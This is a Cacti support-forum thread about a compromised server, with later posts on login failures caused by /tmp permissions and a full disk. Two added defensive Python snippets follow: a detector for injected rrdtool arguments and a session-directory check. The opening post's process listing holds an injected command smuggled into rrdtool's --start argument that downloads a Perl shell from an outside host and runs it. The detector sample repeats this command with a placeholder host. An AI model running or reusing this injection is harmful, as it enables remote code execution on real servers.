Hacked by Cacti?!?!?!

bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

This should say it all:

# ps auxwwwef|./grep wget
www-data 10146 0.0 0.2 2512 1188 ? S 19:29 0:00 | \_ sh -c cd '/usr/share/cacti' ; /usr/bin/rrdtool graph - --imgformat=PNG --start=?wget cteam.3x.ro/shell.jpg -O /tmp/shell.pl;perl /tmp/shell.pl? --end=-300 --title="core - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-autoscale-max --lower-limit=0 --vertical-label="percent" DEF:a="/usr/share/cacti/rra/core_cpu_system_565.rrd":cpu_system:AVERAGE DEF:b="/usr/share/cacti/rra/core_cpu_user_566.rrd":cpu_user:AVERAGE DEF:c="/usr/share/cacti/rra/core_cpu_nice_564.rrd":cpu_nice:AVERAGE CDEF:cdefbc=TIME,1124497454,GT,a,a,UN,0,a,IF,IF,TIME,1124497454,GT,b,b,UN,0,b,IF,IF,TIME,1124497454,GT,c,c,UN,0,c,IF,IF,+,+ AREA:a#FF0000:"System" GPRINT:a:LAST:"Current\:%8.2lf %s" GPRINT:a:AVERAGE:"Average\:%8.2lf %s" GPRINT:a:MAX:"Maximum\:%8.2lf %s\n" STACK:b#0000FF:"User" GPRINT:b:LAST:" Current\:%8.2lf %s" GPRINT:b:AVERAGE:"Average\:%8.2lf %s" GPRINT:b:MAX:"Maximum\:%8.2lf %s\n" STACK:c#00FF00:"Nice" GPRINT:c:LAST:" Current\:%8.2lf %s" GPRINT:c:AVERAGE:"Average\:%8.2lf %s" GPRINT:c:MAX:"Maximum\:%8.2lf %s\n" LINE1:cdefbc#000000:"Total" GPRINT:cdefbc:LAST:" Current\:%8.2lf %s" GPRINT:cdefbc:AVERAGE:"Average\:%8.2lf %s" GPRINT:cdefbc:MAX:"Maximum\:%8.2lf %s" LANG=C PATH=/bin:/usr/bin:/usr/local/bin SNMP_PERSISTENT_FILE=/dev/null


Any suggestions on how to fix this, please let me know immediately. Cacti is shut off completely for now. BTW I'm running 0.8.6b on Linux.
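
The process listing in the post above shows a shell command sitting where the `--start` value of `rrdtool graph` should be. As an added example (not part of the original thread and not Cacti's own code), this Python check flags such entries in `ps` output; it assumes a legitimate `--start`/`--end` value is a single integer followed by another long option, and the sample lines and host name are constructed.

```python
import re

# Captures the value of --start= / --end= up to the next long option.
# Assumption: as in the posted command line, another long option follows.
TIME_OPT = re.compile(r"--(start|end)=(.*?)(?=\s+--[a-z]|$)")
# Assumption: a legitimate value is one integer (epoch seconds or a negative
# offset such as the -300 seen for --end in the post).
NUMERIC = re.compile(r"-?\d+")

# Constructed sample, shortened from the ps output in the post; the host name
# is a placeholder.
SAMPLE_PS = """\
www-data 10146 0.0 0.2 2512 1188 ? S 19:29 0:00 sh -c cd '/usr/share/cacti' ; /usr/bin/rrdtool graph - --imgformat=PNG --start=?wget example.invalid/shell.jpg -O /tmp/shell.pl;perl /tmp/shell.pl? --end=-300 --title="core - CPU Usage" --rigid
www-data 10201 0.0 0.2 2512 1188 ? S 19:30 0:00 sh -c cd '/usr/share/cacti' ; /usr/bin/rrdtool graph - --imgformat=PNG --start=-86400 --end=-300 --title="core - CPU Usage" --rigid
root 10250 0.0 0.1 1800 600 pts/0 S+ 19:31 0:00 grep wget
"""


def suspicious_time_args(cmdline):
    """Return [(option, value)] for --start/--end values that are not integers."""
    if "rrdtool graph" not in cmdline:
        return []
    hits = []
    for m in TIME_OPT.finditer(cmdline):
        value = m.group(2).strip()
        if not NUMERIC.fullmatch(value):
            hits.append((m.group(1), value))
    return hits


def scan(ps_output):
    """Return [(pid, option, value)] for every suspicious rrdtool process line."""
    findings = []
    for line in ps_output.splitlines():
        fields = line.split(None, 2)  # ps aux layout: USER PID rest...
        if len(fields) < 3:
            continue
        for option, value in suspicious_time_args(line):
            findings.append((fields[1], option, value))
    return findings


if __name__ == "__main__":
    for pid, option, value in scan(SAMPLE_PS):
        print(f"PID {pid}: --{option} is not numeric: {value!r}")
```
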
TheWitness
Developer
Posts: 17007
Joined: Tue May 14, 2002 5:08 pm
Location: MI, USA

Post by TheWitness »

Upgrade to Cacti 0.8.6f.
True understanding begins only when we realize how little we truly understand...

Life is an adventure, let yours begin with Cacti!

Author of dozens of Cacti plugins and customizations. Advocate of LAMP, MariaDB, IBM Spectrum LSF and the world of batch. Creator of IBM Spectrum RTM, author of quite a bit of unpublished work and most of Cacti's bugs.

For those wondering, I'm still here, but lost in the shadows. Yearning for less bugs. Who wants a Cacti 1.3/2.0? Streams anyone?
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

Can you please be more specific?

Are you telling me to upgrade to that version because it fixes this issue, or
are you just pointing out the fact that I'm running an old version?
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA

Post by rony »

He is telling you, because it fixes 2 known security issues.

Upgrade to 0.8.6f, it will resolve your security issues.
Tony Roman
Experience is what causes a person to make new mistakes instead of old ones.
There are only 3 ways to complete a project: Good, Fast or Cheap, pick two.
With age comes wisdom, what you choose to do with it determines whether or not you are wise.
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

OK, sorry about that. I just finished upgrading to 0.8.6f per docs/UPGRADE,
and it seemed to go without a hitch.

I can run cactid on the cmdline as the cacti user and it polls everything just fine.

My problem is, I cannot log in to the web interface anymore. When I log in as admin, it goes right back to the login page again. And no, it is not an incorrect password; I tried that and it specifically tells you the password is wrong. In this case it just keeps going right back to the login page when you enter the right password. I also had another normal non-admin user set up, and now when I try to log in as them, I get a "too many redirections" error from my browser. Any help on resolving this? Thanks in advance.

EDIT: I double-checked all the permissions. That does not seem to be the issue.
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

Never mind, I fixed it. It wasn't Cacti permissions, it was /tmp permissions :P

chmod 1777 /tmp fixed the problem. Thanks for the help
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA

Post by rony »

Yah, invalid /tmp permissions cause session files to not be created, which will break logging in.

If your server was hacked, you might want to consider rebuilding it to just be completely sure.

Do you know what they did? How far they got? Have you checked the server for a rootkit?
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

OK, everything has been working fine since the last post where I fixed the /tmp permissions. Now the same thing is happening again, where it takes me right back to the login page after entering the correct user/pass, but only this time I wasn't hacked, and there are no traces of that left anymore anyway. Are there any other things to check for on what might be causing this? I tried to enable all PHP debugging/error levels I could but it does not produce one bit of debug output whatsoever. Any help is greatly appreciated.

EDIT: I triple-checked the /tmp permissions, and it's not that, this time :)

Looking in /tmp I see the sess_<somehash> files being created, so I doubt this issue is related to that.
bparker
Posts: 6
Joined: Fri Jan 28, 2005 9:29 am

Post by bparker »

Seems I simply ran out of disk space, sorry :)
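
The login loop in this thread had two causes: wrong permissions on `/tmp`, where the `sess_` files are written, and later a full disk. As an added example (not part of the original thread, and not Cacti or PHP code), this Python check tests a session directory for both conditions plus a write probe; the function name, the default path taken from the thread and the free-space threshold are assumptions.

```python
import os
import shutil
import stat
import tempfile


def session_dir_problems(path="/tmp", min_free_bytes=1 << 20):
    """Return a list of reasons why session files could fail to be written."""
    problems = []

    # The thread's fix was `chmod 1777 /tmp`: world-writable plus sticky bit.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode != 0o1777:
        problems.append(f"{path}: mode is {mode:04o}, expected 1777")

    # A full filesystem breaks logins the same way (last post in the thread).
    free = shutil.disk_usage(path).free
    if free < min_free_bytes:
        problems.append(f"{path}: only {free} bytes free")

    # Write probe: only meaningful when run as the web server user
    # (www-data in the posted process listing); root bypasses permissions.
    try:
        with tempfile.NamedTemporaryFile(dir=path, prefix="sess_probe_") as fh:
            fh.write(b"x")
            fh.flush()
    except OSError as exc:
        problems.append(f"{path}: cannot create a file ({exc.strerror})")

    return problems


if __name__ == "__main__":
    for problem in session_dir_problems() or ["no problems found"]:
        print(problem)
```
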